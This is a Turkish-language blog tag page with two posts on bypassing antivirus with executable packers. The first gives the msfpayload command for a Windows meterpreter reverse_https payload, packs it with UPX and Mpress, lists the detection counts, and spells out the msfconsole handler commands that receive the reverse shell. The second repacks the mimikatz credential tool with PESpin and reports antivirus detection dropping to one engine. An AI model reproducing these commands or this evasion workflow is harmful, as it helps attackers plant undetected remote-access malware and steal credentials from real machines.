Paketleyiciler etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Paketleyiciler etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

1 Mart 2014 Cumartesi

AV Bypass: Paketleyiciler (2)

AV Bypass: Paketleyiciler (2)
Bu yazıda dosya sıkıştırma uygulamaları kullanılarak bir ters HTTPS bağlantısı kurularak bağlantı sağlanacaktır.

Metasploit kullanılarak oluşturulan bir payload  aşağıdaki gibi gerçekleştirilebilir:
# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 > Uygulama1.exe

Metasploit modülleri olan msfpayload ve msfencode ile zararlı uygulama oluşturma işlemleri için bakınız.

Bu uygulama 36 AV tarafından tespit edilmiştir.


Kali üzerindeki UPX adlı sıkılaştırma aracı ile aynı uygulamanın sıkılaştırılmış hali oluşturulabilir:
upx -9qf -oUygulama2.exe Uygulama1.exe

Sıkıştırılmış dosyanın 37 AV tarafından tespit edilmiştir.


Mpress ile sıkıştırma işlemi aşağıdaki gibidir:

Sıkıştırılmış dosyanın 30 AV tarafından tespit edilmiştir.


Not: Çok fazla yaygınlaşmamış paketleyicilerin kullanılması AV'ler tarafından tespit edilme oranını azlacaktır.

Oluşturulan uygulamanın işlevselliğinde bir değişiklik olmamaktadır. Aşağıdaki komutlar sonrasında uygulama çalıştırılınca ters HTTPS bağlantısı kurulmaktatır.
# msfconsole
# msf exploit(handler) > use exploit/multi/handler
# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
# msf exploit(handler) > set ExitOnSession false
# msf exploit(handler) > set LHOST 192.168.2.48
# msf exploit(handler) > set LPORT 443
# msf exploit(handler) > exploit -j


Gönderen zaman: Hiç yorum yok:
Etiketler: , , , , , , , , , , , ,

AV Bypass: Paketleyiciler


AV Bypass: Paketleyiciler

Dosya sıkıştırma uygulamaları, aslında çalıştırılabilir dosya üzerinde sıkıştırma işlemi gerçekleştirip dosyanın işlevini değiştirmeyen sadece görünümünü değiştiren yazılımlardır. Normal sıkıştırıcılardan (zip, winrar) farklı olarak dosyanın nasıl açılıp yorumlanacağı yeni oluşturulan paketlenmiş dosyanın içerisinde yer alır. Bu yüzden yeni oluşturulan dosyalara kendi başına açılabilir arşiv (self-extracting archive) denilmektedir. Dosya sıkıştırma uygulamalarının, sıkıştırma ve antivirüslerden gizlenme gibi kullanımlarının yanında diğer bir kullanım amacı da tersine mühendislik yapmayı zorlaştırarak yazılımların kaynak kodunun elde edilmesini zorlaştırmaktır.

Dosya sıkıştırma uygulamaları, analiz işini zorlaştırmak için aşağıdaki özellikleri kullanabilirler:
  • Sıkıştırma
  • Şifreleme
  • Tersine mühendislik yöntemlerini zorlaştıran metotlar


Dosya sıkıştırma uygulamaları ile ilgili ayrıntılı bilgi için bakınız.

Bu yazıda dosya sıkılaştırma uygulamaları ile mimikatz adlı bir zararlı yazılım PESpin adlı bir araçla yeniden paketlenecektir. Mimikatz aracının VirusTotal analiz sonucunda 16 AV tarafından tespit edildiği görülmektedir.

PESpin aracı ile mimikatz dosyası seçilir.

Sonuçta bu dosya yeniden paketlenir.

Paketleme işlemi sonrasında yeni dosyanın 1 AV tarafından tespit edildiği görülmektedir.

Yeni uygulamanın işlevselliğinde ise herhangi bir değişiklik olmadığı görülmektedir.

Gönderen zaman: 2 yorum:
Etiketler: , , , , , , , ,
Kaydol: Kayıtlar (Atom)